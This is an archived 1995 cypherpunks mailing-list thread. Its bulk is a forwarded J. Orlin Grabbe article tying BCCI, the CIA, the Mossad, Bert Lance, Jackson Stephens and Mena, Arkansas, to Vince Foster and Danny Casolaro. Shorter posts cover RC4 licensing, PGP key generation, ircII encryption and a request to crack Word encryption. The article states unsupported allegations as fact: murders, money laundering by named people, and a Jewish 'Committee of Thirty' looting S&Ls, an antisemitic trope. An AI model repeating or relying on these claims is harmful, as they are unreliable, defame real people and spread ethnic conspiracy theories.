Subject: <plonk> now!  Grabbe, X, re. Foster, NSA, BCCI, etc.
Message-ID: <Pine.SOL.3.91.950728171939.22819C-100000@use.usit.net>
MIME-Version: 1.0
Content-Type: text/plain




---------- Forwarded message ----------
Date: Fri, 28 Jul 1995 15:49:28 -0400 (EDT)
From: KALLISTE@delphi.com
To: bdolan@use.usit.net
Subject: Part X: Allegations re Vince Foster, the NSA, and Bank Spying

-----BEGIN PGP SIGNED MESSAGE-----

	 Allegations Regarding Vince Foster, the NSA, and 
	       Banking Transactions Spying, Part X

		     by J. Orlin Grabbe

********************************************************************* *
* I received a call from Mr. Stephen Ganis, counsel to the House      *
* Committee on Banking and Financial Services, who assures me that    *
* he did NOT provide Jim Norman's article to Mr. Charles O. Morgan,   *
* attorney for Alltel Information Services, but rather called Mr.     *
* Morgan *after* the *Media Bypass* article had appeared, to get      *
* Morgan's side of things.  Mr. Morgan was apparently not aware       *
* that the article had been published, and that was the only          *
* information he received from Mr. Ganis.  Mr. Ganis assures me       *
* that his group is NOT passing any information to Alltel, but is     *
* in fact carefully keeping all sources and information confidential. *                                                    *
***********************************************************************
     
       What do nuclear weapons, money laundering, covert operations, 
money management, clandestine payments of payola and kickbacks, and the 
systematic monitoring of bank loans and bank wire transfers have in common? 

       The answer begins with BCCI: the Bank of Credit and Commerce 
International. BCCI connects the Israeli bomb to the Pakistani bomb to 
suppliers of banking software like Systematics, and to a very dead money 
launderer named Vince Foster.  

       Don't misunderstand the latter statement: I believe we should all 
have the right to "launder" money. The money-laundering laws are a 
frightening, Big-Brotherly intrusion into financial privacy (see J. Orlin 
Grabbe, "The End of Ordinary Money, Part II: Money Laundering, Electronic 
Cash, and Cryptological Anonymity"). 

       But why is there one standard of legislated "morality" that applies, 
say, to a LEADING OFFICIAL OF THE FEDERAL RESERVE SYSTEM, and another 
standard that applies to everyone else?  
       
       In 1972 Pakistani banks were nationalized by President Bhutto. One   
of these banks was United Bank, whose president was Agha Hasan Abedi.           
Abedi subsequently joined with Sheik Zayad, ruler of Abu Dhabi and patron
of the PLO, to found BCCI.  To prevent nationalization, BCCI was chartered 
in Luxembourg.  In 1975 it split into two entities, one remaining in 
Luxembourg and the other established in the Cayman Islands.  The Cayman 
Islands part became a "bank within a bank."  While the legal registration  
was in Luxembourg and the Cayman Islands, the actual operational head-
quarters was moved to London.

       In 1976 John Heimann, New York superintendent of banking, turned down 
BCCI's attempt to buy Chelsea National Bank in New York.  (Shareholders in 
the bank included former Mayor Robert Wagner and the Finley, Kumble law 
firm.)  The actual purchase attempt was made by one of the Gokal brothers
of shipping fame, Abbas Gokal, using a loan from his sister.  Banking
experience was to be provided by BCCI, but Heimann refused to approve the
purchase, despite several meetings with Abedi.  Abedi realized that BCCI
would not be able to enter the U.S. market under its own name.
	
	Abedi's attention was then brought to bear on Financial General, a 
Washington D.C.-based bank with headquarters a block from the White House.  
The bank had been acquired in April 1977 by an investor group lead by 
William Middendorf II, who was Secretary of the Navy under Nixon and Ford.  
One member of the investor group was Jackson Stephens.  Stephens then send 
salemen from his Little Rock firm *Systematics* to talk to Middendorf 
about providing banking software for Financial General, but they were firmly 
rejected.  Stephens decided to wrest control of the bank from Middendorf.
				       
       Jackson Stephens is a billionaire from Little Rock who owns the 
controlling interest in Worthen National Bank as well as in Stephens Inc., 
one of the largest privately owned investment banks outside Wall Street. 
In November 1977, he introduced BCCI-founder Abedi to Bert Lance, Carter's 
Director of the Office of Management and Budget, whom Stephens had met 
through Jimmy Carter, his old roommate from Naval Academy days. (Lance and 
Stephens, two Southern Baptists, had hit it off.)  Lance also knew the 
people at Financial General, for it was Financial General that had sold 
to Lance controlling interest in the National Bank of Georgia in 1975. 

       Abedi in turn introduced Lance to Stanford-and-Harvard-(and Colorado 
School of Mines)-educated Ghaith Pharaon.  Pharaon proceeded to acquire the 
stock of Bert Lance's National Bank of Georgia, a deal consummated on January 
5, 1978, a day after Lance's $3.4 million loan from the First National Bank 
of Chicago was repaid by BCCI London.  Pharaon was apparently acting on 
behalf of Abedi in the acquisition, at least in part.
								    
       By then Lance had left the Carter administration, and he and Jackson 
Stephens joined together to help BCCI take over Financial General.  A 
Financial General lawsuit filed on February 17 named "Bert Lance, Bank of 
Credit & Commerce International, Agha Hasan Abedi, Eugene J. Metzger, 
Jackson Stephens, Stephens Inc., Systematics Inc. and John Does numbers 1 
through 25." Systematics was represented by C.J. Giroir, Webster Hubbell, 
and Hillary Rodham Clinton of the Rose Law Firm of Little Rock:

	"The suit was ultimately settled, but intriguingly, briefs for 
	Systematics, a Stephens property, were submitted by a trio of 
	lawyers including C.J. Giroir and Webster L. Hubbell and signed 
	by Hillary Rodham" ("Who is Jack Ryan?" *The Wall Street Journal*, 
	August 1, 1994).

       This BCCI-Lance-Stephens-Systematics-Hubbell-Clinton connection will 
continue to reappear in our story.        
						  
	Edwin McAmis, an attorney for Financial General, deposed Lance in 
connection with the stockholder civil suit, and turned up a mysterious loan:

	"The loan could have been for as much as $3.4 million . . . and
	came from London's Bank of Credit & Commerce International, on 
	whose behalf Lance had approached Financial General with a bid 
	for control. . . . Lance said he used it last January to pay off 
	his celebrated $3.4 million loan from the First National Bank of 
	Chicago . . . The latest loan, he said was arranged by Agha Hassan 
	Abedi, an energetic Pakistani who heads B.C.C.I.
	"Collateral?  None.
	"Documents?  Well, no, though Lance's lawyer, Robert Altman,
	says some are being drawn up now." 
	(quoted from "Another 'Loan' for Lance," *Time*, April 3, 1978.)
				     
       Bert Lance had approached Financial General on behalf of BCCI London 
with a bid for control of the bank. Lance was also was responsible for 
introducing BCCI founder Abedi to Jimmy Carter, and for bringing Clark 
Clifford in on the take-over attempt. Ghaith Pharaon was another investor 
in the deal.   

       Also involved in the successful BCCI takeover were Clark Clifford 
(the former Defense Secretary under Johnson and lawyer for BCCI), Robert 
Altman (attorney for Bert Lance and Clifford's partner), and Kamal Adham 
(the former head of Saudi Arabian intelligence who was King Faisal's most 
trusted advisor, and whose half-sister Iffat was King Faisal's favorite 
wife).  Kamal Adham and Ghaith Pharaon had built the Hyatt hotel in Riyad, 
and Adham had originally introduced Pharaon to Abedi.  

	Adham and Pharaon (along with Faisal al-Fulaij and Abdullah Darwaish) 
owned KIFCO, the Kuwaiti International Finance Company (James Ring Adams & 
Douglas Frantz, *A Full Service Bank: How BCCI Stole Billions Around the 
World*, Pocket Books, 1992, p. 52).
				
       In a lawsuit filed March 18, 1978, the Securities and Exchange 
Commission charged Lance with violations of federal security laws, and
BCCI's application to purchase Financial General Bankshares was denied.  
Abedi then formed a new takeover vehicle, Credit and Commerce American
Holdings (CCAH), based in the Netherlands Antilles.  The largest investor  
in CCAH was Kamal Adham, who put up $13 million of his own money  On October 
19, 1978, CCAH filed for approval with the Federal Reserve to purchase 
Financial General.  This application was dismissed on February 16, 1979, 
due to opposition from Financial General's Maryland subsidiary, but a new 
application was submitted later.

	The Federal Reserve finally approved the purchase in on April 19, 
1982, and BCCI renamed the bank "First American" three months later. Clark 
Clifford was made chairman and Robert Altman president.  The head of Bank 
Supervision at the Federal Reserve when BCCI's purchase was approved was 
Jack Ryan, who later became head of the Resolution Trust Corporation, in 
which role he denied Rep. Leach's requests for documents related to Madison 
Guaranty, the Whitewater thrift. 

       What was the point of BCCI's takeover of First American? 
" 'They wanted an important stake across the street from the White House,' 
says one Washington banking executive, adding, 'Some people might think it 
is important to know about the outstanding loans and balances of Government 
officials'" (*Time*).
							
       Abedi used his new-found connections to Jimmy Carter to publicize
BCCI to heads of state around the world.  Abedi made his personal 727 jet 
available to Carter, and accompanied the former President to Thailand,
Tibet, Hong Kong, and the Soviet Union, among other places.  Carter
introduced Abedi to many heads of state, from Den Xiaoping in China to
James Callahan in the U.K.  Abedi donated a half million dollars to
establish the Carter presidential library, and a public policy institute
at Emory university.
			  
       In the meantime BCCI founder Abedi was committed to the development 
of an *Islamic atomic bomb*, even donating 500 million rupees for the 
creation of Pakistan's Gulam Ishaq Research Institute for nuclear 
development. 

       BCCI was in some sense seen by Abedi as the financial competitor to 
the "committee of 30" that worked on behalf of Israel. (According to Israeli 
correspondents Tzadok Yehezkeli and Danny Sadeh: "Israel solicits money 
from wealthy Jews from all over the world for financing its nuclear 
weaponry programs.  This fundraising drive is directed by a committee 
comprised of 30 Jewish millionaires" [review of book *Critical Mass* in 
*Yediot Ahronot*, January 30, 1994].)
	    
       But while BCCI founder Abedi had intended BCCI to finance the 
development of a Pakistani nuclear bomb, this effort was compromised at 
the start by the presence of Kamal Adham, who through CCAH was the 
controlling power behind First American, and who had asked Clark Clifford 
to head up the bank. For Adham was both a CIA and a Mossad asset. Adham, 
in addition to being Faisal's most trusted advisor and the former head of 
Saudi intelligence, had attended CIA training school with the head of the 
Mossad.  

	"Kamal Adham, who was the CIA's principal liason for the 
	entire Middle East from the mid-1960's through 1979, was
	the lead frontman for BCCI in its takeover of First American,
	was an important nominee shareholder in BCCI, and remains one 
	of the key players in the entire BCCI affair" (Senator John
	Kerry and Senator Hank Brown, *The BCCI Affair: a Report to 
	the Committee on Foreign Relations, United States Senate*,
	December 1992).

	Perhaps that is why Pakistani's efforts to develop their own
nuclear bomb met with repeated compromises, such as the following:

	"In 1983 a Dutch court convicted Dr. Abdul Qader Khan, head 
	of Pakistan's nuclear program, on charges of stealing the
	blueprints for a uranium enrichment factory. . . . Kahn's
	lawyer was paid by BCCI.

	"In 1984, three Pakistani nationals were indicted in Houston
	for attempting to buy and ship to Pakistan, high-speed
	switches designed to trigger nuclear weapons.  The trio
	offered to pay in gold supplied by BCCI.

	"In 1987 two Americans, Rita and Arnold Mandel, together with
	Hong Kong businessman Leung Yu Hung, were indicted by the
	U.S. Attorney in Sacramento, California, on charges of illegal
	importations of $1 billion worth of oscilloscopes and computer
	equipment for Pakistan's nuclear program. . . . BCCI facilitated
	[some of the shipments]" 
	
	"In 1987 in Philadelphia, Ashad Pervez, a Pakistani-born
	Canadian, was indicted for conspiring to export restricted
	specialty steel and metal used to enhance nuclear explosions.
	...  He . . . paid high prices with money delivered to the 
	Toronto BCCI branch from BCCI London" (Rachel Ehrenfeld,
	*Evil Money*, HarperCollins, 1992).

	BCCI became a important conduit for CIA intelligence, and also 
a ready target for the tenacles of the NSA.  When Norman Bailey at the 
National Security Council urged NSA to "follow the money" as part of the 
"wars" on terrorism and drugs, the NSA had BCCI as one obvious banking 
target.  The CIA was there also to assist in the monitoring of BCCI-related 
money flows of other intelligence and criminal enterprises. For BCCI had 
become a giant laundry machine, and the CIA made use of BCCI for their own 
covert money transfers.  

	One example involves Manuel Noriega, who was recruited by the
U.S. Defense Intelligence Agency in 1959, who went on the CIA payroll in
1967, and who became head of Panamanian military intelligence in 1968,
where he was in a strategic position to supply both information and drugs
to the United States, and later on arms to the contras in an operation
based in Panama, Mexico, and Mena, Arkansas.  CIA money was paid to
Noriega through the Panamanian branch of BCCI.  The CIA and U.S. Army
only acknowledge paying Noreiga $322,226 between 1955 and 1986 (*The
New York Times*, January 19, 1991).  Be that as it may, Noriega 
deposited $33 million in his account (under the name of the Panamanian 
Defense Forces) at the Panamanian branch of BCCI. The head of this branch 
was the son of a former director of intelligence in Pakistan.

	The CIA also used BCCI branches in Pakistan to launder payments
to the Afghan rebels, and Pakistani officials used the same bank to
launder heroin profits.  The finance minister of Pakistan, Sarti Asis,
confirms that the bank did launder CIA contributions to the Afghan
rebels, but claims it was "not even handling 1 percent of total drug
money" (*Financial Times*, July 25, 1991).

	The amount the CIA recalls paying Noriega is too small.  Noriega 
had much earlier gotten into trouble with the State Department because of
his drug dealing.  But this changed when his support was needed in
the negotiations for a new Panama Canal Treaty.

	"By 1976, Noriega was fully forgiven.  CIA Director George
	Bush arranged to pay Noriega $110,000 a year for his services,
	put the Panamanian up as a houseguest of his deputy CIA
	director, and helped to prevent an embarrassing prosecution
	of several American soldiers who had delivered highly
	classified U.S. intelligence secrets to Noriega's men.
	. . .

	"If Carter needed friends in Panama to smooth the way for
	a canal treaty, Reagan (who strongly opposed that treaty)
	needed them to support the Contra cause. . . . CIA payments
	to Noriega resumed when Reagan took office in 1981, starting
	at $185,000 a year.  At their peak, in 1985, Noriega
	collected $200,000 from the Agency.  The CIA deposited the
	money in Noriega's account at the Bank of Credit and Commerce
	International, two of whose units later pleaded guilty to 
	laundering drug money.  CIA Director William Casey frequently
	met with Noriega alone in Washington" (Peter Dale Scott and
	Jonathan Marshall, *Cocaine Politics:  Drugs, Armies, and the
	CIA in Central America*, University of California Press, 1991).

	That Noriega was necessarily used as an NSA asset also follows from 
the fact that Panama served as the listening post to much of South America.
       
	The Bush-Noriega-BCCI-Mena connection continued.  Barry Seal, who 
flew money, drugs, and arms out of Mena, Arkansas, acquired his job through 
George Bush.  After Seal was indicted in Ft.Lauderdale, Florida, in 1983 for 
a shipment of 200,000 Quaaludes, he tried in vain to make a deal with the 
DEA.  He found a more sympathetic audience in the Vice President:  
". . . in March 1984, while out of jail on an appeal bond, 'Seal flew his 
Lear jet to Washington and telephones Vice President Bush's office'; and he 
spoke on the street to staff members of the vice president's South Florida 
Task Force" (Scott and Marshall).

	How did Jackson Stephens react to all this activity in his back
yard?  Well, among other things, Stephens and his Worthen National Bank 
invested in Harken Energy, a Texas company in which George Bush, Jr., was 
a board member.  "The money Stephens invested came through the Swiss BCCI 
subsidiary" (Rachel Ehrenfeld).

	What about Bill Clinton, Governor of Arkansas?  Ex-CIA agent
Cord Meyer has privately confided to a friend of mine (to whom Meyer has
no reason to lie) that he recruited Clinton through the London station
while Clinton was a student in England.  This Clinton was hardly ignorant 
of CIA activity or devoid of CIA contact.

	In 1987 First American bought the National Bank of Georgia, formerly 
acquired from Bert Lance by Pharaon. Another BCCI-First American connection
was Robert Gray, a First American director, and head of the Washington 
office of the public relations firm Hill & Knowlton.  Gray represented
BCCI and did favors for Caspar Weinberger, among others.

	"In October 1988, three days after the Bank of Credit and
	Commerce International (BCCI) was indicted by a federal
	grand jury for conspiring with the Medellin Cartel to
	launder $32,000,000 in illicit drug profits, the bank hired
	H&K [Hill and Knowlton] to manage the scandal.  Robert Gray
	also served on the board of directors of First American 
	Bank, the Washington D.C. bank run by Clark Clifford (now
	facing federal charges) and owned by BCCI.  Gray was close
	to, and helped in various ways, top Reagan officials.  When
	Secretary of Defense Caspar Weinberger's son needed a job,
	Gray hired him for $2,000 a month"  ("Hill & Knowlton,
	Robert Gray, and the CIA," by Johan Carlisle, *Covert Action
	Quarterly*, #44, Spring 1993).

	It was also Hill & Knowlton, you will recall, who later brought us 
the staged melodrama in the House Human Rights Caucus.  The production
starred the tearful "Nayirah"--in fact daugher of the Kuwaiti Ambassador to 
the U.S. She told of Iraqi soldiers taking babies out of incubators and 
leaving them on the cold floor to die. (Someone later alleged that her 
follow-up story about Iraqi soldiers roasting Belgian babies, using bayonets 
as spits, had to be dropped when it was discovered that there were in fact 
no Belgians in the Middle East.) George Bush was to repeat this concocted 
story a dozen times in the next few days, in the process of whipping up war 
fever against his old business associate, Saddam Hussein.

	BCCI was closed down by the Bank of England, acting in conjunction
with others, on July 5, 1991. When BCCI closed, many of its money-management, 
money-laundering, and monetary-intelligence duties were transferred to
FinCEN, a newly created unit of the U.S. Treasury.  

	The Mena connections to Clinton and Bush have now, through Jackson 
Stephens, been extended to Robert Dole.  Jackson Stephens (along with Tyson) 
has recently thrown his support behind the Dole campaign.  In this regard it 
is perhaps useful to note that:

	"On November 27, 1987, an Arkansas State Police detective 
	received a call from a reporter for information about an 
	investigation into an aircraft maintenance firm named Rich 
	Mountain Aviation. Located at a small airport in the little 
	town of Mena, which stands virtually alone in the far west 
	of Arkansas near the Oklahoma border, Rich Mountain was at
	the center of secret operations including cocaine smuggling 
	in the name of national security. The reporter was seeking 
	confirmation that the drug network operating out of Rich 
	Mountain was part of Lt. Colonel Oliver North's network. 
	He believed this group was smuggling cocaine into the US
	through Mena and using the profits to support the Contras 
	as well as themselves.

	"Arkansas State Police Detective Russell Welch  . . . was 
	called by an Arkansas sheriff six weeks later who related 
	that he had information indicating that US Senator Robert 
	Dole was concerned about the Rich Mountain investigation. 
	In particular, the sheriff's informant stated that Dole was 
	worried that the investigation might in some way harm
	George Bush" (Alan A Block, "Drugs, Law, and the State,"
	Hong Kong University Press, 1992).
	
	By contrast to Pakistan's ultimately inept attempt at nuclear
weapon construction, Israel's nuclear warfare system had thrived.  Parts
of this system included the national military command center, the Bor,
located beneath Tel Aviv; the subterranean strategic air command post on 
the edge of the Negev at Nevatim Air Base; the nuclear fuel reactor at  
Dimona; the nuclear weapons laboratories at Nahal Soreq; the missile test 
range at Yavne; the underground factory at Be'er Yaakov where the
Jericho long-range missiles are manufactured; the nuclear weapons
design lab (Division 20) and missile design development lab (Division
48) and weapons assembly plant at Rafael; the nuclear weapons bunkers in 
the Negev at Tel Nof Air Base; and the Jericho missiles in bunkers west 
of Zekharyeh in the Judean hills.

	"By marrying atomic bombs first to long-range aircraft in the
Black Squadrons and ultimately to intercontinental ballistic missiles,
Israel become the first Third World country to post a strategic threat to
a superpower.  That development was not lost on the Kremlin.  Following
the test in September 1989 of an advanced Jericho-2 ballistic missile,
whose range covered the oil fields at Baku and could possibly reach the
port of Odessa as well, a Soviet Foreign Ministry spokesman said that 
'Israel is known to possess a technological basis necessary for the creation
of nuclear weapons.  The availability of delivery systems makes Israel
a source of danger, far exceeding the boundaries of the Middle East
region'" (William E. Burrows and Robert Windrem, *Critical Mass*, Simon
& Schuster, 1994).
		  
	Where did the money to pay for all this come from?  In the beginning 
it was a simple matter of collecting donations. "In 1960, a Committee of 
Thirty (Jewish millionaires) was asked to quietly raise funds for the nuclear 
weapons project.  It collected $40 million for the construction of the 
reactor and the adjoining, fabulously expensive, underground plutonium 
separation plant at Dimona" (Burrows and Windrem).

	But life did not stay this simple.  For example, the BCCI-Bush-
Noriega-Mena connection to drug smuggling was matched by an similar Israeli 
connection to arms and drug dealing and money laundering. Anything went in 
the holy crusade to built the bomb and the associated missile delivery 
systems.  Just as the pension funds controlled by Robert Maxwell were 
looted to pay for Mossad operations in Europe (Victor Ostrovsky, 
*The Other Side of Deception*, HarperCollins, 1994, p. 203), so were 
American S&Ls in effect looted (or burdened with debt) by the financial 
machinations of the "Committee of Thirty" to help generate the vast 
funds needed to maintain and expand Israel's defense industry.  Some of 
these funds found their way into offshore accounts held by U.S. politicians 
and defense personnel as bribes, kickbacks, "campaign" contributions, 
and payment for stolen secrets.
	
	That, for example, Noreiga was a Mossad, as well as CIA, asset 
follows from the fact his closest confidant and advisor was Michael Harari, 
formerly number three man in the Mossad, who specialized in assassination.  
Harari had fouled-up a case and had the wrong man killed, and was transferred 
to Mexico where he became station chief for Latin America.  After allegedly 
retiring, Harari went to Panama as a security advisor to Noreiga, where 
he trained UESAT, Noriega's elite personnal bodyguards.  During the U.S. 
invasion of Panama, the U.S. helped Harari escape back to Israel.
	    
	On the Central and Latin American money-laundering side, Scott 
and Marshall relate, in a long footnote:

	"One of the most intriguing reports of an Israeli-Colombian
	drug connection was the story in *Hadashot* that the Cali
	cartel 'employs Israelis, especially in transferring funds
	from drug sales in the U.S. to the bank accounts of the heads 
	of the cartel in Colombia and Panama.  They are also assisted
	by banking services in Israel' (September 1, 1989).  The
	newspaper alleged that the Cali cartel is run by Colombian
	Jews; actually, they are only involved in its money-laundering
	operations.  Jews who emigrated from Europe in the 1930s
	established banking and money-channels exploited by the drug 
	entrepreneurs in the 1970s and 1980s (interview with a federal
	agent, November 15, 1989).  One of the chief Cali money
	launderers was Isaac Kattan, a drug associate of both Alberto
	Sicilia-Falcon and Juan Ramon Matta Ballesteros (Mills,
	*Underground Empire*, 168; Kerry report, 286-88).  Kattan
	boasted that he invested his millions in Israel bonds 
	(*Newsweek*, July 20, 1981).  Kattan had connections to
	Nicaraguans through the cocaine-trafficking Espinosa brothers
	(*New York Times*, February 28, 1981) and the Popular Bank
	and Trust, owned by a prominent Nicaraguan exile and used as
	a conduit for Contra and State Department humanitarian funds
	(*Miami Herald*, June 14, 1987; *Village Voice*, July 1, 1986).
	In 1988, federal authorities broke up a nationwide money-
	laundering ring serving the Cali cartel.  It was run by two
	Israelis who won the cooperation of a network of Hassidic
	Jews and a former Israeli Air Force captain by claiming
	they were moving the money on behalf of Mossad to finance
	'anti-Communist guerrillas in Central America,' presumably
	the Contras. (Ibid; *Kol Ha'ir*, April 14, 1989; *Northern
	California Jewish Bulletin*, January 13, 1989; United Press
	International, March 17, 1989.)
	
	Nuclear weapons.  Money laundering.  This juxtaposition leads 
us back to BCCI and a body in Virginia.  The death of investigative reporter 
Danny Casolaro was, like that of Vince Foster, alleged to be "suicide" in 
the face of all contrary evidence.  Three days before his murder at the
hands of hut-dwelling wackos, Casolaro showed a friend some checks drawn 
on BCCI:  

	"Ben Mason [an old friend] arrived at Casolaro's about 
	3:30 P.M. 'I was really hungry and anxious to go get 
	something to eat,' he recalled, 'but he was taking his 
	time, as usual. He took me downstairs, pulled out a box, 
	and showed me some pages. Five separate pages, spread 
	them out on the floor. The first had something to do 
	with some arms deals. I remember the name Khashoggi.
	It was about Iran-Contra.'

	"The second and third pages were photocopies of checks, 
	made out for $1 million and $4 million; they were 
	photocopies of checks drawn on BCCI . . . accounts
	held by Adnon Khashoggi, the international arms merchant 
	and factotum for the House of Saud, and by Manucher 
	Ghorbanifar, the arms dealer and Iran-Contra middleman."          
	(James Ridgeway and Doug Vaughan, "The Last Days of Danny 
	Casolaro, *The Village Voice*, October 15, 1991).

			[To be continued]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMBljlmX1Kn9BepeVAQFJ5gP+IGqG2mCF9u0FVKpNzJYCfLMv8ip+LFcY
lfOOczoK0V1znELeJc1R531/sYMC2iNxKR5O8z8eYiQX87qS054xcu1k+ye6QY1G
z77tgFD3sQqu+4utEhkCD4o+BpwzdZ1dc3w+ZgEEIHtwPwZWzbmn7g1cvIvpdIJv
LGwiE7dD/tw=
=WIpY
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Richard.Johnson@Colorado.EDU (Richard Johnson)
Date: Fri, 28 Jul 95 16:37:03 PDT
To: cypherpunks@toad.com
Subject: Re: RC4
Message-ID: <v02130501ac3ee1843139@[199.117.100.37]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

>So, does anyone know for certain if this is the true letter of the law?
>Since RC4 has been reverse engineered (or leaked) to the public, do they
>have any claim on it if there is no patent?  Seeing the legal web that
>surrounds a lot of the current crypto situation in the US, it's not
>surprising that RSA would try to smoke screen everyone into thinking that
>there would be a clear violation (prosecutable by law) if anyone used RC4
>without getting a license.  (It's also not surprising that no one's tried
>as well...)

A acquaintance of mine at a now-defunct company compared the reverse
engineered RC4 work-alike that was released on the net with the source they
had licensed from RSADSI.  She noted that the implementations were quite
different (structure and variable names were both very different), so the
work-alike released on the net was indeed most likely reverse engineered.
Someone else queried two or three other BSAFE source licensees, and found
all agreed that the code was not cribbed from BSAFE sources.  Sadly, I no
longer have copies of the (anonymous) post.

Still, I'm not rich enough to punch through RSADSI's smoke screen...


Richard

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMBky1fobez3wRbTBAQHh2AP/dPCZxvp8W2CXG/mqN7iuYc1oH+t0XiH8
wAnNQ2+0BbWzVyzt3YalUp6/JPXDBm1kGVWxmy+UUY8y0dfYpsi78T4aQxoPpG13
Kfc7MQat77SGvhRzNAcMei0h+hyMUmwGqnaetuSGIbFcyPbcnn4F8nq8JBOHXHcF
03+m959OKVk=
=wTxS
-----END PGP SIGNATURE-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@panix.com>
Date: Fri, 28 Jul 95 15:06:46 PDT
To: Brad Dolan <bdolan@use.usit.net>
Subject: Re: <plonk> now! Grabbe, X, re. Foster, NSA, BCCI, etc.
In-Reply-To: <Pine.SOL.3.91.950728171939.22819C-100000@use.usit.net>
Message-ID: <199507282206.SAA11720@panix4.panix.com>
MIME-Version: 1.0
Content-Type: text/plain



Brad Dolan writes:
> Subject: Part X: Allegations re Vince Foster, the NSA, and Bank Spying
> 
> -----BEGIN PGP SIGNED MESSAGE-----
> 
> 	 Allegations Regarding Vince Foster, the NSA, and 
> 	       Banking Transactions Spying, Part X

This is cypherpunks, a mailing list for people interested in
cryptography and its social implications. This is not "Conspiracy
Buffs Digest: All The Silly Conspiracy Theories You Can Read".

Please take the noise postings elsewhere.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Al Billings" <mimir@io.com>
Date: Fri, 28 Jul 95 18:09:05 PDT
To: cypherpunks@toad.com
Subject: Word cracking
Message-ID: <199507290108.AA18206@relay.interserv.com>
MIME-Version: 1.0
Content-Type: text/plain



 I have a Microsoft Word document that is encrypted in some fashion. 
Does anyone know of any utilities to crack whatever Encryption is in 
Word 6.0?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Fri, 28 Jul 95 15:29:02 PDT
To: cypherpunks@toad.com
Subject: Re: your mail
In-Reply-To: <QQzaju18595.199507282134@relay4.UU.NET>
Message-ID: <9507282222.AA29615@all.net>
MIME-Version: 1.0
Content-Type: text


> 
> On Fri, 28 Jul 1995, Dr. Frederick B. Cohen wrote:
> 
> > Philo Zimmerman would almost certainly
> > win if they ever took him to court, but by harassing him in this more
> > subtle way, they destroy the impact of PGP in the marketplace, get MIT
> > to support an official (and perhaps customized for the NSA to have weak
> > keys) version,
> 
> I've personally pulled apart the innards of both MIT pgp 2.6.2 and the 
> non-MIT pgp 2.6.2i in order to generate large primes and full RSA keys.  
> 
> There are no hacks in MIT pgp that cause it to generate weak keys.

How (specifically) do you know that this is true?  Key generation is
very tricky stuf, and very subtle changes can have very profound impacts.
I doubt that Zimmerman's original was truly perfect at this either, but
how do we really know?

-- 
-> See:  Info-Sec Heaven using our New Super Secure World-Wide-Web Server
-> Free: Test your system's security (scans deeper than SATAN or ISS!)
---------------------- both at URL: http://all.net ----------------------
-> Read: "Protection and Security on the Information Superhighway"
	 John Wiley and Sons, 1995 ISBN 0-471-11389-1, 320 pp, $24.95
-------------------------------------------------------------------------
   Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sdw@lig.net (Stephen D. Williams)
Date: Fri, 28 Jul 95 15:29:13 PDT
To: cypherpunks@toad.com
Subject: IRC encryption
Message-ID: <m0sbxti-0009tPC@sdwsys>
MIME-Version: 1.0
Content-Type: text/plain


I've ducked out of the IRC world mostly after the first couple years, but
this looks like you could setup pgp/rsa.perl/something that would be
interesting:

*** Help on ENCRYPT
Usage: ENCRYPT [<nickname>|<channel> [<key>]]
  ENCRYPT allows you to hold an encrypted conversations with
  a person or a whole channel.  Once a nickname/channel and
  key is specified, all messages you send to that
  nickname/channel will automatically be encrypted using the
  given key.  Likewise, any messages from that nickname/channel
  will automatically be decrypted. ircII is smart enough to know
  if the incoming message isn't encrypted and will not attempt to
  decrypt it.  If you received an encrypted message from someone
  for whom you haven't specified a key, it will be displayed as
  [ENCRYPTED MESSAGE].

  The <key> can be any text which is to be used an they key
  for encryption/decryption of the conversation.  It is up to
  you and the people you wish to talk to about how to agree upon
  a key and how to communicate it to one another.

  For example, if user CheeseDog wishes to talk encryptedly with
  user DogCheese, they must first agree on an encryption key
  (case sensitive), say foo.  Then user CheeseDog must issue a
    ENCRYPT DogCheese foo
  and user DogCheese must issue a
    ENCRYPT CheeseDog foo
  Thereafter, all messages sent between CheeseDog and DogCheese
  will be encrypted and decrypted automatically.

  If ENCRYPT is given with a nickname but no key, then encrypted
  conversation is ended with that user.  If ENCRYPT is given with
  no arguments, the list of encrypted user and keys are
  displayed.

  IrcII uses a built in encryption method that isn't terribly secure.
  You can use another if you so choose, see SEE ENCRYPT_PROGRAM
  for information about this.

  If you are sending encrypted messages to a user or channel, you
  can toggle it off and on in a message line by inserting the
  control-E character in the input line.  This is usually done
  by hitting control-Q then control-E.  An inverse video E will
  appear in the input line.

Note:
  Control-q is bound (see BIND) to quote_character by default.
  It is frequently necessary to change this to some other char.

See Also:
  SET ENCRYPT_PROGRAM
*** You have new email.
*** No help available on encrypt_program: Use ? for list of topics
*** Help on ENCRYPT_PROGRAM
Usage: SET ENCRYPT_PROGRAM <encryption program path>
  Sets the program used to encrypt and decrypt messages.  The
  program selected must take an encryption key as the first
  command line argument to work with IRCII.

sdw
-- 
Stephen D. Williams 25Feb1965 VW,OH (FBI ID) sdw@lig.net http://www.lig.net/sdw
Consultant, Vienna,VA Mar95- 703-918-1491W 43392 Wayside Cir.,Ashburn, VA 22011
OO/Unix/Comm/NN       ICBM/GPS: 39 02 37N, 77 29 16W home, 38 54 04N, 77 15 56W
Pres.: Concinnous Consulting,Inc.;SDW Systems;Local Internet Gateway Co.;28May95



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex Tang <altitude@cic.net>
Date: Fri, 28 Jul 95 17:41:06 PDT
To: owner-cypherpunks@toad.com
Subject: Re: your mail
In-Reply-To: <QQzajx27588.199507282224@relay4.UU.NET>
Message-ID: <199507290040.UAA26790@petrified.cic.net>
MIME-Version: 1.0
Content-Type: text/plain


On Fri Jul 28 18:24:16 1995: you scribbled...
> 
> The answer is to have some non-USA entity build shareable full fledged 
> full powered crypto libraries and provide them for free for the rest of 
> the world and for all machines.

Wouldn't there still be licensing issues to deal with (in the states at
least)??  I'm sure RSA would claim that the package would be in violation
of the licensing...

(this doesn't mean i'm not all for it.  I only wish i was outside of the
states to help... :(

...alex...

